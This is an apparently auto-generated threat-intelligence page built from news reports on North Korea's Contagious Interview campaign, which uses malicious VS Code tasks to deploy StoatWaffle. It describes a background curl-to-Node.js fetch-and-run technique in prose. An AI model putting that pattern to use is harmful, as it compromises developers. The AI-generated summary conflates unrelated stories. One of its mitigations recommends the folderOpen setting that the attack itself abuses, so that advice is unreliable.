INSPECTING ARCHIVED INTELLIGENCE (OUTDATED VERSION).
North Korean Hackers Deploy StoatWaffle Malware via VS Code Tasks
| 2026-03-23 18:09 CRITICAL HIGHExecutive Summary AI-generated
The US Department of Justice has announced the sentencing of three men - Audricus Phagnasay, Jason Salazar, and Alexander Paul Travis - for their roles in furthering North Korea's fraudulent information technology worker scheme. These individuals have been found guilty of practically giving the keys to the online kingdom to likely North Korean overseas technology workers seeking illicit revenue. The scheme involves a complex network of IT workers from prestigious universities in North Korea who attend an intensive interview process before joining, and those chosen are not junior developers but rather founders, CTOs, and senior engineers with elevated access to company tech infrastructure and cryptocurrency wallets. This is part of a coordinated malware campaign targeting cryptocurrency professionals through LinkedIn social engineering, fake venture capital firms, and fraudulent video conferencing links. The scheme also involves the use of VS Code Auto-Run Tasks to deploy StoatWaffle malware, which has been attributed to North Korean Hackers Abuse VS Code.
Technical Mitigations AI-generated
* Use secure coding practices, such as validating user input and ensuring proper error handling, to prevent the exploitation of vulnerabilities like those found in StoatWaffle.
* Regularly update and patch dependencies, including npm packages, to ensure that known vulnerabilities are addressed before they can be exploited by attackers.
* Implement robust access controls, such as multi-factor authentication (MFA) and role-based access control (RBAC), to limit the privileges of developers and prevent unauthorized access to sensitive systems or data.
* Use secure coding guidelines and best practices for VS Code projects, including configuring tasks.json to run on folderOpen mode instead of automatic execution when files are opened in VS Code.
Technical Observables
AI Podcast (EN) detail_available
detail_listen_ai (EN)
Intelligence Metadata
Actors / Malware / CVEs / Campaigns
Contagious InterviewContagious Interview
BeaverTailBeaverTailInvisibleFerretInvisibleFerret
Target & Sectors
DPRK
DPRK
technologytechnology
governmentgovernment
Incident Timeline
November 2025
North Korean hackers used VS Code auto-run tasks to deploy StoatWaffle malware.
Click on any entity below to view its context and source!
organisation
Phagnasay and Salazar
Phagnasay and Salazar were both sentenced to three years of probation and a $2,000 fine.
financial
$2,000 $ fine
Phagnasay and Salazar were both sentenced to three years of probation and a $2,000 fine.
financial
$193,265 prison
Travis was sentenced to one year in prison and ordered to forfeit $193,265, the amount earned by North Koreans by using his identity.
2025-12-21
Threat actors used a VS Code auto-run task to deploy StoatWaffle malware.
Click on any entity below to view its context and source!
infrastructure
Vs Code
First
disclosed
by OpenSourceMalware last month, the attack essentially involves instructing prospective targets to clone a repository on GitHub, GitLab, or Bitbucket, and launch the project in VS Code as part of a supposed job assessment.
organisation
GitHub
First
disclosed
by OpenSourceMalware last month, the attack essentially involves instructing prospective targets to clone a repository on GitHub, GitLab, or Bitbucket, and launch the project in VS Code as part of a supposed job assessment.
organisation
GitLab
First
disclosed
by OpenSourceMalware last month, the attack essentially involves instructing prospective targets to clone a repository on GitHub, GitLab, or Bitbucket, and launch the project in VS Code as part of a supposed job assessment.
organisation
Bitbucket
First
disclosed
by OpenSourceMalware last month, the attack essentially involves instructing prospective targets to clone a repository on GitHub, GitLab, or Bitbucket, and launch the project in VS Code as part of a supposed job assessment.
December 2025
Threat actors used VS Code auto-run tasks to deploy StoatWaffle malware.
Click on any entity below to view its context and source!
infrastructure
Vs Code
The use of VS Code "tasks.json" to distribute malware is a
relatively new tactic
adopted by the threat actor
since December 2025
, with the attacks leveraging the "runOn: folderOpen" option to automatically trigger its execution every time any file in the project folder is opened in VS Code.
The victims are believed to have been infected via a malicious VS Code extension or an npm package.
In a sign that the threat actors are actively refining their tradecraft, newer mutations of the VS Code projects have eschewed Vercel-based domains for GitHub Gist-hosted scripts to download and execute next-stage payloads that ultimately lead to the deployment of FlexibleFerret.
These VS Code projects are staged on GitHub.
observable
tasks.json
The use of VS Code "tasks.json" to distribute malware is a
relatively new tactic
adopted by the threat actor
since December 2025
, with the attacks leveraging the "runOn: folderOpen" option to automatically trigger its execution every time any file in the project folder is opened in VS Code.
organisation
FlexibleFerret
In a sign that the threat actors are actively refining their tradecraft, newer mutations of the VS Code projects have eschewed Vercel-based domains for GitHub Gist-hosted scripts to download and execute next-stage payloads that ultimately lead to the deployment of FlexibleFerret.
organisation
OtterCookie
Some of the key malware families deployed as part of these attack chains include
OtterCookie
(a backdoor capable of extensive data theft),
InvisibleFerret
(a Python-based backdoor), and
FlexibleFerret
(a modular backdoor implemented in both Go and Python).
organisation
GolangGhost
Its Go and Python variants go by the monikers GolangGhost and PylangGhost, respectively.
organisation
PylangGhost
Its Go and Python variants go by the monikers GolangGhost and PylangGhost, respectively.
threat_actor
Contagious Interview
A campaign known as
PolinRider
has
implanted
a malicious obfuscated JavaScript payload in hundreds of public GitHub repositories that culminates in the deployment of a new version of
BeaverTail
, a known stealer and downloader malware attributed to Contagious Interview.
Microsoft, in an
analysis
of Contagious Interview this month, said the threat actors achieve initial access to developer systems through "convincingly staged recruitment processes" that mirror legitimate technical interviews, ultimately persuading victims into running malicious commands or packages hosted on GitHub, GitLab, or Bitbucket as part of the assessment.
organisation
PolinRider
A campaign known as
PolinRider
has
implanted
a malicious obfuscated JavaScript payload in hundreds of public GitHub repositories that culminates in the deployment of a new version of
BeaverTail
, a known stealer and downloader malware attributed to Contagious Interview.
organisation
GitLab
Microsoft, in an
analysis
of Contagious Interview this month, said the threat actors achieve initial access to developer systems through "convincingly staged recruitment processes" that mirror legitimate technical interviews, ultimately persuading victims into running malicious commands or packages hosted on GitHub, GitLab, or Bitbucket as part of the assessment.
organisation
Microsoft
Microsoft, in an
analysis
of Contagious Interview this month, said the threat actors achieve initial access to developer systems through "convincingly staged recruitment processes" that mirror legitimate technical interviews, ultimately persuading victims into running malicious commands or packages hosted on GitHub, GitLab, or Bitbucket as part of the assessment.
organisation
GitHub
The attack is said to have compromised the GitHub account of a long-time neutralinojs contributor with organization-level write access to force-push JavaScript code that retrieves encrypted payloads in Tron, Aptos, and Binance Smart Chain (BSC) transactions to download and run BeaverTail.
organisation
Tron, Aptos
The attack is said to have compromised the GitHub account of a long-time neutralinojs contributor with organization-level write access to force-push JavaScript code that retrieves encrypted payloads in Tron, Aptos, and Binance Smart Chain (BSC) transactions to download and run BeaverTail.
organisation
BSC
The attack is said to have compromised the GitHub account of a long-time neutralinojs contributor with organization-level write access to force-push JavaScript code that retrieves encrypted payloads in Tron, Aptos, and Binance Smart Chain (BSC) transactions to download and run BeaverTail.
infrastructure
Macos
If the compromised system runs on macOS, it also steals the iCloud Keychain database.
organisation
Node.js
"StoatWaffle is a modular malware implemented by Node.js, and it has Stealer and RAT modules," the Japanese security vendor said.
organisation
Stealer
"StoatWaffle is a modular malware implemented by Node.js, and it has Stealer and RAT modules," the Japanese security vendor said.
infrastructure
Windows
"Though we assume that the executing OS is Windows in this article, the essential behaviors are the same for any OS."
organisation
Mozilla Firefox
StoatWaffle has been found to deliver two different modules -
A stealer that captures credentials and extension data stored in web browsers (Chromium-based browsers and Mozilla Firefox) and uploads them to a command-and-control (C2) server.
organisation
Neutralinojs
Among the compromises are
four repositories
belonging to the Neutralinojs GitHub organization.
organisation
WeaselStore
It's worth mentioning here that
FlexibleFerret
is also referred to as WeaselStore.
2026-01-13
Threat actors used VS Code auto-run tasks to deploy StoatWaffle malware.
Click on any entity below to view its context and source!
infrastructure
Vs Code
Another analysis from Security Alliance last week has also
laid out
the campaign's abuse of VS Code tasks in an attack where an unspecified victim was approached on LinkedIn, with the threat actors claiming to be the chief technology officer of a project called Meta2140 and sharing a Notion[.]so link that contains a technical assessment and a URL to a Bitbucket repository hosting the malicious code.
industry
Technology
Another analysis from Security Alliance last week has also
laid out
the campaign's abuse of VS Code tasks in an attack where an unspecified victim was approached on LinkedIn, with the threat actors claiming to be the chief technology officer of a project called Meta2140 and sharing a Notion[.]so link that contains a technical assessment and a URL to a Bitbucket repository hosting the malicious code.
organisation
Security Alliance
Another analysis from Security Alliance last week has also
laid out
the campaign's abuse of VS Code tasks in an attack where an unspecified victim was approached on LinkedIn, with the threat actors claiming to be the chief technology officer of a project called Meta2140 and sharing a Notion[.]so link that contains a technical assessment and a URL to a Bitbucket repository hosting the malicious code.
organisation
Notion[.]so
Another analysis from Security Alliance last week has also
laid out
the campaign's abuse of VS Code tasks in an attack where an unspecified victim was approached on LinkedIn, with the threat actors claiming to be the chief technology officer of a project called Meta2140 and sharing a Notion[.]so link that contains a technical assessment and a URL to a Bitbucket repository hosting the malicious code.
January 2026
Microsoft included a new "task.allowAutomaticTasks" setting in the January 2026 update of VS Code to mitigate North Korean hackers' abuse.
Click on any entity below to view its context and source!
infrastructure
Vs Code
In response to the ongoing abuse of VS Code Tasks, Microsoft has included a mitigation in the January 2026 update (
version 1.109
) that introduces a new "task.allowAutomaticTasks" setting, which defaults to "off" in order to improve security and prevent unintended execution of tasks defined in "tasks.json" when opening a workspace.
observable
tasks.json
In response to the ongoing abuse of VS Code Tasks, Microsoft has included a mitigation in the January 2026 update (
version 1.109
) that introduces a new "task.allowAutomaticTasks" setting, which defaults to "off" in order to improve security and prevent unintended execution of tasks defined in "tasks.json" when opening a workspace.
infrastructure
1.109
In response to the ongoing abuse of VS Code Tasks, Microsoft has included a mitigation in the January 2026 update (
version 1.109
) that introduces a new "task.allowAutomaticTasks" setting, which defaults to "off" in order to improve security and prevent unintended execution of tasks defined in "tasks.json" when opening a workspace.
general_metric
1.109 version
In response to the ongoing abuse of VS Code Tasks, Microsoft has included a mitigation in the January 2026 update (
version 1.109
) that introduces a new "task.allowAutomaticTasks" setting, which defaults to "off" in order to improve security and prevent unintended execution of tasks defined in "tasks.json" when opening a workspace.
February 2026
North Korean threat actors used VS Code auto-run tasks to deploy StoatWaffle malware.
Click on any entity below to view its context and source!
infrastructure
1.110
"This version and the recent February 2026 (
version 1.110
) release also introduce a secondary prompt that warns the user when an auto-run task is detected in a newly opened workspace.
general_metric
1.110 release
"This version and the recent February 2026 (
version 1.110
) release also introduce a secondary prompt that warns the user when an auto-run task is detected in a newly opened workspace.
organisation
the U.S. Department of Justice (DoJ
"
The findings come as the U.S. Department of Justice (DoJ)
announced
the sentencing of three men -- Audricus Phagnasay, 25, Jason Salazar, 30, and Alexander Paul Travis, 35 -- for their roles in furthering North Korea's fraudulent information technology (IT) worker scheme in violation of international sanctions.
organisation
Audricus Phagnasay
"
The findings come as the U.S. Department of Justice (DoJ)
announced
the sentencing of three men -- Audricus Phagnasay, 25, Jason Salazar, 30, and Alexander Paul Travis, 35 -- for their roles in furthering North Korea's fraudulent information technology (IT) worker scheme in violation of international sanctions.
infrastructure
Macos
"The campaign is cross-platform by design, delivering tailored payloads for both macOS and Windows.
infrastructure
Windows
"The campaign is cross-platform by design, delivering tailored payloads for both macOS and Windows.
organisation
Workspace Trust
This acts as an additional guard after a user accepts the Workspace Trust prompt.
organisation
GhostCall
The activity shares overlap with clusters tracked as
GhostCall and UNC1069
.
organisation
ClickFix
"The attack chain culminates in a ClickFix-style fake CAPTCHA page that tricks victims into executing clipboard-injected commands in their Terminal," MacPaw's Moonlock Lab
said
.
organisation
CAPTCHA
"The attack chain culminates in a ClickFix-style fake CAPTCHA page that tricks victims into executing clipboard-injected commands in their Terminal," MacPaw's Moonlock Lab
said
.
organisation
Terminal
"The attack chain culminates in a ClickFix-style fake CAPTCHA page that tricks victims into executing clipboard-injected commands in their Terminal," MacPaw's Moonlock Lab
said
.
organisation
MacPaw
"The attack chain culminates in a ClickFix-style fake CAPTCHA page that tricks victims into executing clipboard-injected commands in their Terminal," MacPaw's Moonlock Lab
said
.
2026-03-16
North Korean hackers used VS Code auto-run tasks to deploy StoatWaffle malware.
Click on any entity below to view its context and source!
source_region
DPRK
Last week, Flare and IBM X-Force
published
a detailed look at the
IT worker
operation
and its
internal structure
, while highlighting how IT workers attend prestigious universities in North Korea and go through a rigorous interview process themselves before joining the scheme.
target_region
Korea, Democratic People's Republic of
Last week, Flare and IBM X-Force
published
a detailed look at the
IT worker
operation
and its
internal structure
, while highlighting how IT workers attend prestigious universities in North Korea and go through a rigorous interview process themselves before joining the scheme.
organisation
IBM
Last week, Flare and IBM X-Force
published
a detailed look at the
IT worker
operation
and its
internal structure
, while highlighting how IT workers attend prestigious universities in North Korea and go through a rigorous interview process themselves before joining the scheme.
organisation
NTT Security
"This task is configured so that it downloads data from a web application on Vercel regardless of executing OS [operating system]," NTT Security
said
in a report published last week.
2026-03-23
North Korean-linked hackers target developers via malicious VS Code projects, deploying StoatWaffle malware.
Click on any entity below to view its context and source!
infrastructure
Vs Code
North Korea-Linked Hackers Target Developers via Malicious VS Code Projects.
The North Korean threat actors associated with the long-running
Contagious Interview
campaign have been observed using malicious Microsoft Visual Studio Code (VS Code) projects as lures to deliver a backdoor on compromised endpoints.
North Korean Hackers Abuse VS Code Auto-Run Tasks to Deploy StoatWaffle Malware.
The North Korean threat actors behind the Contagious Interview campaign, also tracked as WaterPlum, have been attributed to a malware family tracked as
StoatWaffle
that's distributed via malicious Microsoft Visual Studio Code (VS Code) projects.
The end goal of these efforts is to abuse
VS Code task configuration files
to execute malicious payloads staged on Vercel domains, depending on the operating system on the infected host.
The task is configured such that it runs every time that file or any other file in the project folder is opened in VS Code by setting the "runOn: folderOpen" option.
Contagious Interview Using VS Code Tasks
Subsequent iterations of the campaign have been
found
to conceal sophisticated multi-stage droppers in task configuration files by disguising the malware as harmless spell-check dictionaries as a fallback mechanism in the event the task is unable to retrieve the payload from the Vercel domain.
The starting point of the attack chain is no different in that it's activated when the victim clones and opens a malicious Git repository using VS Code.
The development comes as Red Asgard
detailed
its investigation into a malicious repository that has been found to use a VS Code task configuration to fetch obfuscated JavaScript designed to drop a full-featured backdoor named
Tsunami
(aka TsunamiKit) along with an XMRig cryptocurrency miner.
"
To counter the threat, developers are advised to exercise caution when interacting with third-party repositories, mainly those originating from unfamiliar sources or shared directly during coding tests; review source code contents before opening them in VS Code; install only vetted npm packages.
infrastructure
Visual Studio Code
The North Korean threat actors associated with the long-running
Contagious Interview
campaign have been observed using malicious Microsoft Visual Studio Code (VS Code) projects as lures to deliver a backdoor on compromised endpoints.
The North Korean threat actors behind the Contagious Interview campaign, also tracked as WaterPlum, have been attributed to a malware family tracked as
StoatWaffle
that's distributed via malicious Microsoft Visual Studio Code (VS Code) projects.
"When the project is opened, Visual Studio Code prompts the user to trust the repository author," Xhaflaire explained.
This allows execution to continue independently if the Visual Studio Code process is terminated, while suppressing all command output.
"The abuse of Visual Studio Code task configuration files and Node.js execution demonstrates how these techniques continue to evolve alongside commonly used development tools."
threat_actor
Contagious Interview
The North Korean threat actors associated with the long-running
Contagious Interview
campaign have been observed using malicious Microsoft Visual Studio Code (VS Code) projects as lures to deliver a backdoor on compromised endpoints.
The North Korean threat actors behind the Contagious Interview campaign, also tracked as WaterPlum, have been attributed to a malware family tracked as
StoatWaffle
that's distributed via malicious Microsoft Visual Studio Code (VS Code) projects.
Contagious Interview Using VS Code Tasks
Subsequent iterations of the campaign have been
found
to conceal sophisticated multi-stage droppers in task configuration files by disguising the malware as harmless spell-check dictionaries as a fallback mechanism in the event the task is unable to retrieve the payload from the Vercel domain.
organisation
Microsoft Visual Studio Code
The North Korean threat actors associated with the long-running
Contagious Interview
campaign have been observed using malicious Microsoft Visual Studio Code (VS Code) projects as lures to deliver a backdoor on compromised endpoints.
The North Korean threat actors behind the Contagious Interview campaign, also tracked as WaterPlum, have been attributed to a malware family tracked as
StoatWaffle
that's distributed via malicious Microsoft Visual Studio Code (VS Code) projects.
organisation
Deploy StoatWaffle
North Korean Hackers Abuse VS Code Auto-Run Tasks to Deploy StoatWaffle Malware.
organisation
StoatWaffle
The North Korean threat actors behind the Contagious Interview campaign, also tracked as WaterPlum, have been attributed to a malware family tracked as
StoatWaffle
that's distributed via malicious Microsoft Visual Studio Code (VS Code) projects.
organisation
Red Asgard
The development comes as Red Asgard
detailed
its investigation into a malicious repository that has been found to use a VS Code task configuration to fetch obfuscated JavaScript designed to drop a full-featured backdoor named
Tsunami
(aka TsunamiKit) along with an XMRig cryptocurrency miner.
organisation
TsunamiKit
The development comes as Red Asgard
detailed
its investigation into a malicious repository that has been found to use a VS Code task configuration to fetch obfuscated JavaScript designed to drop a full-featured backdoor named
Tsunami
(aka TsunamiKit) along with an XMRig cryptocurrency miner.
organisation
XMRig
The development comes as Red Asgard
detailed
its investigation into a malicious repository that has been found to use a VS Code task configuration to fetch obfuscated JavaScript designed to drop a full-featured backdoor named
Tsunami
(aka TsunamiKit) along with an XMRig cryptocurrency miner.
organisation
the Visual Studio Code
This allows execution to continue independently if the Visual Studio Code process is terminated, while suppressing all command output.
organisation
The Hacker News
"This activity involved the deployment of a backdoor implant that provides remote code execution capabilities on the victim system," security researcher Thijs Xhaflaire
said
in a report shared with The Hacker News.
infrastructure
Macos
Using a seemingly harmless dictionary file as a backup option (Source: OpenSourceMalware)
"On macOS systems, this results in the execution of a background shell command that uses nohup bash -c in combination with curl -s to retrieve a JavaScript payload remotely and pipe it directly into the Node.js runtime.
"It's worth noting that the payload we observed for macOS was written purely in JavaScript and had many signs of being AI assisted.
organisation
Node.js
Interestingly, the attack chain is engineered to fallback to two other methods: installing a
malicious npm dependency
named "
grayavatar
" or running JavaScript code that's responsible for retrieving a sophisticated Node.js controller, which, in turn, runs five distinct modules to log keystrokes, take screenshots, scans the system's home directory for sensitive files,
substitute wallet addresses
copied to the clipboard, credentials from web browsers, and establish a persistent connection to a remote server.
organisation
Apple
In one case, the Apple device management firm said it observed more JavaScript instructions being executed roughly eight minutes after the initial infection.
organisation
DPRK
Threat actors with ties to the Democratic People's Republic of Korea (DPRK) are known to specifically go after software engineers, particular those working in cryptocurrency, blockchain, and fintech sectors, as they often tend to have privileged access to financial assets, digital wallets, and technical infrastructure.
organisation
the Democratic People's Republic of Korea
Threat actors with ties to the Democratic People's Republic of Korea (DPRK) are known to specifically go after software engineers, particular those working in cryptocurrency, blockchain, and fintech sectors, as they often tend to have privileged access to financial assets, digital wallets, and technical infrastructure.
Tactical Metrics
Metrics
infrastructure
Vs Code
Affected Product
Click for context!
North Korea-Linked Hackers Target Developers via Malicious VS Code Projects.
Another analysis from Security Alliance last week has also
laid out
the campaign's abuse of VS Code tasks in an attack where an unspecified victim was approached on LinkedIn, with the threat actors claiming to be the chief technology officer of a project called Meta2140 and sharing a Notion[.]so link that contains a technical assessment and a URL to a Bitbucket repository hosting the malicious code.
The North Korean threat actors associated with the long-running
Contagious Interview
campaign have been observed using malicious Microsoft Visual Studio Code (VS Code) projects as lures to deliver a backdoor on compromised endpoints.
First
disclosed
by OpenSourceMalware last month, the attack essentially involves instructing prospective targets to clone a repository on GitHub, GitLab, or Bitbucket, and launch the project in VS Code as part of a supposed job assessment.
The end goal of these efforts is to abuse
VS Code task configuration files
to execute malicious payloads staged on Vercel domains, depending on the operating system on the infected host.
The task is configured such that it runs every time that file or any other file in the project folder is opened in VS Code by setting the "runOn: folderOpen" option.
Contagious Interview Using VS Code Tasks
Subsequent iterations of the campaign have been
found
to conceal sophisticated multi-stage droppers in task configuration files by disguising the malware as harmless spell-check dictionaries as a fallback mechanism in the event the task is unable to retrieve the payload from the Vercel domain.
The starting point of the attack chain is no different in that it's activated when the victim clones and opens a malicious Git repository using VS Code.
The development comes as Red Asgard
detailed
its investigation into a malicious repository that has been found to use a VS Code task configuration to fetch obfuscated JavaScript designed to drop a full-featured backdoor named
Tsunami
(aka TsunamiKit) along with an XMRig cryptocurrency miner.
"
To counter the threat, developers are advised to exercise caution when interacting with third-party repositories, mainly those originating from unfamiliar sources or shared directly during coding tests; review source code contents before opening them in VS Code; install only vetted npm packages.
North Korean Hackers Abuse VS Code Auto-Run Tasks to Deploy StoatWaffle Malware.
The North Korean threat actors behind the Contagious Interview campaign, also tracked as WaterPlum, have been attributed to a malware family tracked as
StoatWaffle
that's distributed via malicious Microsoft Visual Studio Code (VS Code) projects.
The use of VS Code "tasks.json" to distribute malware is a
relatively new tactic
adopted by the threat actor
since December 2025
, with the attacks leveraging the "runOn: folderOpen" option to automatically trigger its execution every time any file in the project folder is opened in VS Code.
The victims are believed to have been infected via a malicious VS Code extension or an npm package.
In a sign that the threat actors are actively refining their tradecraft, newer mutations of the VS Code projects have eschewed Vercel-based domains for GitHub Gist-hosted scripts to download and execute next-stage payloads that ultimately lead to the deployment of FlexibleFerret.
These VS Code projects are staged on GitHub.
In response to the ongoing abuse of VS Code Tasks, Microsoft has included a mitigation in the January 2026 update (
version 1.109
) that introduces a new "task.allowAutomaticTasks" setting, which defaults to "off" in order to improve security and prevent unintended execution of tasks defined in "tasks.json" when opening a workspace.
Metrics
infrastructure
Visual Studio Code
Affected Product
The North Korean threat actors associated with the long-running
Contagious Interview
campaign have been observed using malicious Microsoft Visual Studio Code (VS Code) projects as lures to deliver a backdoor on compromised endpoints.
"When the project is opened, Visual Studio Code prompts the user to trust the repository author," Xhaflaire explained.
This allows execution to continue independently if the Visual Studio Code process is terminated, while suppressing all command output.
"The abuse of Visual Studio Code task configuration files and Node.js execution demonstrates how these techniques continue to evolve alongside commonly used development tools."
The North Korean threat actors behind the Contagious Interview campaign, also tracked as WaterPlum, have been attributed to a malware family tracked as
StoatWaffle
that's distributed via malicious Microsoft Visual Studio Code (VS Code) projects.
Metrics
infrastructure
Macos
Affected Product
Using a seemingly harmless dictionary file as a backup option (Source: OpenSourceMalware)
"On macOS systems, this results in the execution of a background shell command that uses nohup bash -c in combination with curl -s to retrieve a JavaScript payload remotely and pipe it directly into the Node.js runtime.
"It's worth noting that the payload we observed for macOS was written purely in JavaScript and had many signs of being AI assisted.
If the compromised system runs on macOS, it also steals the iCloud Keychain database.
"The campaign is cross-platform by design, delivering tailored payloads for both macOS and Windows.
Metrics
infrastructure
Windows
Affected Product
"Though we assume that the executing OS is Windows in this article, the essential behaviors are the same for any OS."
"The campaign is cross-platform by design, delivering tailored payloads for both macOS and Windows.
Metrics
infrastructure
1.109
Software Version
In response to the ongoing abuse of VS Code Tasks, Microsoft has included a mitigation in the January 2026 update (
version 1.109
) that introduces a new "task.allowAutomaticTasks" setting, which defaults to "off" in order to improve security and prevent unintended execution of tasks defined in "tasks.json" when opening a workspace.
Metrics
infrastructure
1.110
Software Version
"This version and the recent February 2026 (
version 1.110
) release also introduce a secondary prompt that warns the user when an auto-run task is detected in a newly opened workspace.
Metrics
financial
2,000
$ Fine
Phagnasay and Salazar were both sentenced to three years of probation and a $2,000 fine.
Metrics
financial
193,265
Prison
Travis was sentenced to one year in prison and ordered to forfeit $193,265, the amount earned by North Koreans by using his identity.
Intelligence Sources
The Hacker News
2026-01-20
The Hacker News
2026-03-23
Unpublish from Social Media?
Are you sure you want to delete this podcast video from all synchronized social networks (YouTube, Facebook, Threads)?
Important:
Due to Meta API restrictions, Instagram Reels cannot be deleted automatically via API by third-party apps.
View Profile to Delete Manually
View Profile to Delete Manually
Tactical Intelligence
Report Intelligence Issue
Podcast Options
Generate
Reset / Delete
Incident Version History
CURRENT VERSION
Last Updated: 2026-04-27T11:35
Comprehensive Tactical Telemetry
Highly Correlated Entities
40x
organisation
Identified Entity
Security Alliance
entity
8x
timeline
Temporal Reference
2026-01-13
date
5x
tactic
Cyber Operation Type
Espionage
tactic
4x
infrastructure
Affected Product
Vs Code
software
4x
tactic
MITRE ATT&CK Technique
T1059.006 - Python
technique
3x
target region
Target Country
Korea, Democratic People's Republic of
country
2x
industry
Targeted Sector
Technology
sector
2x
malware
Malware Payload
BeaverTail
tool
2x
infrastructure
Software Version
1.109
version
Contextual Telemetry
Context Block
8 METRICS
source region
Origin Country
Korea, Democratic People's Republic of
country
source region
Origin Region
DPRK
region
threat actor
APT Group
Contagious Interview
actor
target region
Target Region
DPRK
region
general metric
Version
1
version
general metric
Release
1
release
financial
$ Fine
2,000
$ fine
financial
Prison
193,265
prison
Click on any entity below to view its context in the main text!
Selective Unpublish
Selecciona las redes de las que quieres eliminar esta publicación. El sistema intentará borrar el post real de la API y limpiará la base de datos para que puedas volver a lanzarlo.
By navigating this website, you accept the use of strictly necessary technical cookies for session security and basic platform functionality. We do not use tracking or advertising cookies.
Read our Privacy Policy.